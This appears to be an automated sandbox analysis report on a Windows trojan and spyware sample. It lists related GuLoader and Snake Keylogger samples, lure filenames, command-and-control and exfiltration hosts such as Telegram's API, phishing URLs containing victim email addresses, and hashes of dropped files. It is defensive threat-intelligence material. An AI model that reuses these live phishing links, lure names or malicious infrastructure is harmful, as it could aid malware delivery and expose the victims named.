                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:________.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/9@7/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 98%
                                                                                                        • Number of executed functions: 191
                                                                                                        • Number of non-executed functions: 126
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                                                        • Excluded domains from analysis (whitelisted): odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, odc-commonafdrk-geo.onedrive.akadns.net, odc-commonafdrk-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        TimeTypeDescription
                                                                                                        01:36:49API Interceptor8630453x Sleep call for process: ________.exe modified
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        149.154.167.220ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.krGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                              1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            188.114.97.38dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • qegyhig.com/login.php
                                                                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • lysyvan.com/login.php
                                                                                                                            UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • lysyvan.com/login.php
                                                                                                                            1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • lysyvan.com/login.php
                                                                                                                            Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • lysyvan.com/login.php
                                                                                                                            WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • lysyvan.com/login.php
                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • qegyhig.com/login.php
                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                            • qegyhig.com/login.php
                                                                                                                            Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • paste.ee/d/E2K3h
                                                                                                                            fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.figa1digital.services/zjtq/
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            reallyfreegeoip.orgOrder&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            HALKBANK.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            CkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            checkip.dyndns.comALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            HALKBANK.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            CkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            api.telegram.orgOrder&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.krGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            TELEGRAMRUALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.krGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            CLOUDFLARENETUSSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            https://login.ocsgroup.com.mx/global/employee?user_id=DoFjJTOXrEySD0w_AN5X5CnN_jKgmQ-62fmUaqLwe1mjA5n_sht8bM4gHHi97AmLcwpN7hYmIxQBjkE9CyfZa5CdVasJGlMIE2D58ioGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.18.95.41
                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            https://secure_sharing0documentpreview.wesendit.com/dl/UXseZ6Oj8WT8cWxHq/bXVoYW1hZC5hZGkubXVxcmlAc2ltZWRhcmJ5LmNvbQGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.21.30.157
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.80.55
                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            https://sv-management.solarflevoland.nl/wixGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.16.124.96
                                                                                                                            CLOUDFLARENETUSSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            https://login.ocsgroup.com.mx/global/employee?user_id=DoFjJTOXrEySD0w_AN5X5CnN_jKgmQ-62fmUaqLwe1mjA5n_sht8bM4gHHi97AmLcwpN7hYmIxQBjkE9CyfZa5CdVasJGlMIE2D58ioGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.18.95.41
                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            https://secure_sharing0documentpreview.wesendit.com/dl/UXseZ6Oj8WT8cWxHq/bXVoYW1hZC5hZGkubXVxcmlAc2ltZWRhcmJ5LmNvbQGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.21.30.157
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.80.55
                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            https://sv-management.solarflevoland.nl/wixGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.16.124.96
                                                                                                                            ORACLE-BMC-31898USSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            HALKBANK.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 152.67.126.107
                                                                                                                            CkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            HALKBANK.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Order&picture sample8398398392838PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            AdobePDQ5.6.1.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://vinculocomputer.com/run/Get hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            AdobeViewerPDQ5.5.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dllSnurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                      Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                          Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                            rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              Remittance Copy For Advance Payment PO _PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2218188
                                                                                                                                                Entropy (8bit):2.986726085961109
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:8W6Gb40pbjQAl/O9uVl3T+lo65mFvCb/fSQd8rRd:8W6GsAjQ2mYV905evY/6Rf
                                                                                                                                                MD5:96D283A2382E1FB51AFB38BA1E81E26C
                                                                                                                                                SHA1:FA0CDB7DE06897D81D6DF6463883E72FD73F63F7
                                                                                                                                                SHA-256:4AB5BD9941534EC0F4EB155FF57002632A69C75D5BB602C13132A3D23D5BA07B
                                                                                                                                                SHA-512:4157227C87ABBABAB23A68F6DE472FDAC1A582BD96E7A7604520F1B7C70A994B586324EFD41F2AE83E087E5D667A9035042CCEA40F500F0AB1CA8F83FCAD1A9E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:.B......,.......,.......D...............:A......8B..........................................................................................................................................................................................................................................G...J...............h...............................................................g...............................................................j...............................................................................................................................+...........;...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11264
                                                                                                                                                Entropy (8bit):5.801108840712148
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                                                                                MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                                                                                SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                                                                                SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                                                                                SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: Snurrevoddenes.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Eksistensberettigelsernes102.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: PRICE ENQUIRY - RFQ 6000073650.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Factura Honorarios 2024-10.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Shipping documents 00039984849900044800.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Fa24c148.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: rFa24c148.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Remittance Copy For Advance Payment PO _PDF.exe, Detection: malicious, Browse
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):243457
                                                                                                                                                Entropy (8bit):1.2556862555304324
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:BObeQfxNU+OmdH9zR+FY73WLYZLbReg24pPjHp5IIHLP96H7ub2g9zEQyhOrqjUC:EfpiYZgCO4zTJJEQ56XsZ3W
                                                                                                                                                MD5:2C2AECA05F67661A0A6798FD3DA68257
                                                                                                                                                SHA1:43140C33EE2A2C3B729CFDE53AD2A7E4D2436BBB
                                                                                                                                                SHA-256:568B8DEE1985CEAFE404B08549F7363DD53A667C7A2BDF80CA8C57BA7ED9FDA0
                                                                                                                                                SHA-512:F833EF465CFDB410BE15E2D647DFFA91C3787D19E6155B7F33F2A3127368A20C35B15442AA9C5FE5953E85DCA80DB843E530705AC22E5A19ABDB604EF85EC81C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:................................K............H.......................................#............,..............................................................................g..........................>...................3..............................P.../......................-................'.........................H...........................................................G...................................................g..................B.....'.....................>....................................v.........................................:.....................................S..............................._.............................................y.......................................E.......i.............................!...........M..X.......................................................{...$..............................g.....[.........................................=.................7..............-...............................................g.......
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 36028797018963968.000000
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):370481
                                                                                                                                                Entropy (8bit):1.2536250775230349
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:KsTb+NlXRBRrADr1ILH0FvruLfYOL3u4cF:rCNRRsY0FDSQaQ
                                                                                                                                                MD5:0D9A1AE53B3662ECA9655EF20BB4E0CE
                                                                                                                                                SHA1:CA647617571F73E4FF815AC7DB91F3FF4BF170A6
                                                                                                                                                SHA-256:033C22A52C94A106582A33B0C267681B6A4EE7D668E4AA7DA9BD9D0DF05DEA1F
                                                                                                                                                SHA-512:CF89E8EE9AFB4491890D8AF3FE2F7B855C41B68DEE9746155E1E05CC0B91B390D69C0DF905FDE22E9F3580241A57B1A5050903AC32F2695AB5F6485ACB5161E8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:...~........................................x......H..........S..........d............................................................................................................m...............................R.....w...........V.........Z.................b......>........................:..................................................................................................................j..................3..b.....................*.......................P...............................................................#............<.......................................0...a........C......_..........................................................................p..{..........................K.......I.......................E..................&...................................... ............q..........+........................|..................................e.......a..........tQ............I/.........K......................T........................................
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:ASCII text, with very long lines (401), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):403
                                                                                                                                                Entropy (8bit):4.236334007211441
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:NRkE9FLJJzKZl6O8oMOvusjy7TVLt09BQiux:N7nLjG8oM6jMp093ux
                                                                                                                                                MD5:F9E44960FAD1DE9A72E38ED010895F2E
                                                                                                                                                SHA1:56742A285F6AF1D49A3C57941D7562B58601E072
                                                                                                                                                SHA-256:73F4D5E40CB4BBF5C59C41C8CDDB8F9F7D320470538716B66AA7796EDDB7C6C8
                                                                                                                                                SHA-512:A7642172F96CFA0C3BFDB34FA575C40BD7ECD88C43DD4DF3354AAC3A0F7C6C8709B42AC88838CD5CBB4B3AF32BB48B6A9D1D2EB77C5F55295A88876B271EF1FA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:milvago spiralfjedrenes cushier.decine myggesvrmenes deorganization.giannulas poser kloners sammenhfter femoghalvtreds abettals peripatopsidae.tetradic stoppegarner hjemgivelsen masseorganisation lanx,heddinge kricketen symptomer kinas societism avanti tropistic.sarandon mesonyx sangskriveren biblioskopernes tangram zarebas friordningen bygningsingenirs ventilationernes bambusmaattens signatarmagts..
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
